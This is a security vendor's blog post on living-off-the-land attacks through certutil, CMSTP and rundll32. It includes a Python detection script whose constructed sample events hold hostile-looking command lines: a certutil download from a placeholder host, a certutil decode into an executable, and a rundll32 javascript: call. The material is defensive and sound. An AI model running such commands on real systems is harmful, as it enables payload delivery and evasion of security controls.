How Carbon Black is Prioritizing Living Off the Land Attacks Part 2

2019-07-08T17:00:30
ID CARBONBLACK:C4FEA41A8451E22CFF4286F51AF58106
Type carbonblack
Reporter Katie DeMatteis
Modified 2019-07-08T17:00:30

Description

What are Living Off the Land (LoL) Attacks?

In recent years, Living off the Land Binaries and Scripts (LoLBas) have become increasingly popular tools for cybercriminals. These types of attacks leverage native, signed, and often pre-installed applications in malicious ways that their creators never intended. Exploiting trusted tools and applications makes it easier for attackers to remain undetected in systems—as these tools are preinstalled on the operating system and can be utilized to bypass security controls such as application whitelisting and traditional anti-virus—making LoL attacks extremely appealing to hackers.

Carbon Black + LoL Attacks

At Carbon Black, we understand the impact a LoLBin-based attack can have on a company—and we’re constantly working to ensure that your systems are protected. By staying up to date on the latest attack trends, we are able to improve our capabilities, allowing you to worry less and focus on what matters.

Recently, we published a blog on three LoL binaries attackers use for Initial Access, Execution and Defense Evasion.

In this blog post we will focus on a few different areas of the MITRE ATT&CK™ framework and discuss some techniques we see being used after an attacker has gained Initial Access to a system. In addition to the Defense Evasion and Execution tactics we covered in the last post, this post will also include Privilege Escalation, Command and Control, and Exfiltration:

  • Certutil Used as a Download Cradle or for File Obfuscation: Certutil—a native signed Windows application used to manage certificates on a system—is a LoL binary attackers leverage for multiple purposes. Once an attacker has access to a machine, they can leverage certutil to copy potentially malicious files onto the disk (T1105). After this, the attacker can use other native binaries—such as MSBuild which was covered in our previous blog post—to proxy the execution of their code (T1218). Furthermore, certutil has the ability to encrypt files, which attackers often do to obfuscate data prior to data exfiltration (T1022). This makes it harder for a defender to see what data is leaving the system. If certutil is handling or encrypting/decrypting any file types other than certificates, it is likely malicious behavior. Carbon Black’s behavioral detection abilities allow customers to be alerted when applications like certutil handle suspect files and perform actions that are not typical of that application’s normal behavior.
  • CMSTP Leveraged as a User Account Control Bypass: After an attacker has gained initial access to a system and has delivered the files needed for the first stage of their attack, there are many methods they can use to escalate privileges and execute malicious activity. One such technique is to leverage applications that bypass Windows user account control (T1088) to gain elevated privileges without any user notification. Attackers have learned to proxy malicious binaries (T1218) through the Microsoft Connection Manager Profile Installer (CMSTP)—a native signed Windows application normally used to manage profiles for VPN connections—and run them with escalated privileges, leaving users unaware of the activity. The lack of user notification in this scenario makes it easier for these types of attacks to go undetected. Carbon Black’s ability to spot malicious use cases of CMSTP keeps users aware of when attackers may be performing malicious activity with escalated privileges in their system.
  • Rundll32 Executing Rogue JavaScript: Another application that attackers leverage to proxy arbitrary code execution is rundll32 (T1085)—a native application used to launch .dll files. A lesser-known functionality of rundll32 is its ability to execute JavaScript on the command line. Through either direct invocation or via another malicious file, attackers can call rundll32 to execute malicious JavaScript commands. This is not the intended purpose of the rundll32 application and, in most cases, is malicious in nature. Carbon Black has the ability to see when rundll32 is being used in this manner and will alert users to this potentially malicious behavior.
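The three behaviors above, written as process-creation detection rules and run over a handful of constructed events. This is an added illustration, not Carbon Black's code or detection logic; the event layout, sample paths, rule names and the certificate-extension list are assumptions made for the example.

```python
import re
from typing import List, Tuple

# Constructed process-creation events for this example (not real Carbon Black telemetry).
# Each tuple: (parent image name, image path, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -addstore Root C:\temp\corp-ca.cer"),                        # expected use
    ("cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -decode C:\Users\Public\stage.txt C:\Users\Public\stage.exe"),  # obfuscation
    ("cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -urlcache -f http://files.example.invalid/s.txt C:\Users\Public\s.txt"),
    ("explorer.exe", r"C:\Windows\System32\cmstp.exe",
     r"cmstp.exe C:\ProgramData\CorpVPN\corpvpn.inf"),                           # expected use
    ("cmstp.exe", r"C:\Users\Public\update.exe", r"update.exe /quiet"),          # proxied child
    ("winword.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),           # expected use
    ("winword.exe", r"C:\Windows\System32\rundll32.exe",
     'rundll32.exe javascript:"<constructed placeholder>"'),                     # inline script
]

# File types certutil is expected to touch; anything else is the "non-certificate file" signal.
CERT_EXTENSIONS = {".cer", ".crt", ".pem", ".der", ".p7b", ".pfx", ".p12", ".sst", ".crl", ".csr"}
WIN_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+')  # crude Windows path matcher, enough for this example

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(parent: str, image: str, cmdline: str) -> List[Tuple[str, str]]:
    """Return (rule, ATT&CK technique) pairs that fire for one process-creation event."""
    hits: List[Tuple[str, str]] = []
    name, lower = image_name(image), cmdline.lower()
    if name == "certutil.exe":
        if "://" in lower:                                   # fetching remote content (T1105)
            hits.append(("certutil_download_cradle", "T1105"))
        for path in WIN_PATH.findall(cmdline):               # any non-certificate file argument
            ext = ("." + path.rsplit(".", 1)[-1].lower()) if "." in image_name(path) else ""
            if ext not in CERT_EXTENSIONS:
                hits.append(("certutil_non_certificate_file", "T1022"))
                break
    if name == "rundll32.exe" and "javascript:" in lower:    # a script, not a DLL, on the command line
        hits.append(("rundll32_inline_javascript", "T1085"))
    if parent.lower() == "cmstp.exe" and not image.lower().startswith("c:\\windows\\"):
        hits.append(("cmstp_spawned_non_system_binary", "T1218"))  # CMSTP proxying execution
    return hits

def triage(events):
    """Run every rule over a batch of events; return (cmdline, hits) for those that fired."""
    return [(cmd, hits) for p, img, cmd in events if (hits := classify(p, img, cmd))]
```

Of the seven constructed events, the four anomalous ones fire and the three expected uses stay silent; in production the parent/child and command-line fields would come from the endpoint sensor's process events.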

Carbon Black has developed an approach to detection and prevention that can help stop these and other types of attacks as they appear—whether they’ve been seen before or not. Our teams conduct behavioral threat research to discover novel behavioral patterns used by attackers. These patterns stretch across the entire scope of the kill chain, transcending any individual attack and allowing us to provide protection against a broad set of threats without relying on specific pre-discovered IOCs. With Carbon Black, you can rest easy knowing that you’re protected from the attacks we’ve highlighted and more.

For more details on LoL binaries and scripts check out the whitepaper written by Carbon Black’s Threat Analysis Unit (TAU).

